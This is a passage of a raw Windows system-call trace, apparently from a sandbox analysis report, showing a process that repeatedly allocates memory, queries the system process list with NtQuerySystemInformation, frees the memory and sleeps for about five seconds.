SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0238.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0238.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0238.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0238.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.604] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0238.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0238.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0238.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0238.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0238.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0238.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.710] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0238.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0238.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0238.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0238.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0238.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0238.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.819] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0238.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0238.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0238.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0238.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0238.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0238.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.936] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0238.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0238.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0238.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0238.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0238.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0239.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.061] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0239.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0239.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0239.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0239.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0239.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0239.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.217] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0239.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0239.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0239.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0239.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0239.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0239.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.365] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0239.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0239.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0239.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0239.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0239.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0239.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.529] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0239.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0239.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0239.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0239.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0239.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0239.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.650] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0239.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0239.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0239.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0239.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0239.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0239.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.816] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0239.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0239.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0239.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0239.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0239.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0240.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.042] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0240.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0240.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0240.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0240.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0240.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0240.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.261] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0240.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0240.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0240.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0240.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0240.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0240.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.402] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0240.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0240.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0240.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0240.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0240.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0240.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.563] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0240.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0240.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0240.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0240.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0240.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0240.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.689] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0240.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0240.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0240.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0240.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0240.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0240.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.822] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0240.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0240.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0240.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0240.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0240.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0240.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.932] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0240.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0240.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0240.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0240.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0240.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0241.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.037] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0241.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0241.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0241.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0241.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0241.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0241.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.147] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0241.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0241.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0241.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0241.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0241.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0241.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.296] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0241.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0241.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0241.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0241.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0241.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0241.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.424] NtDelayExecution 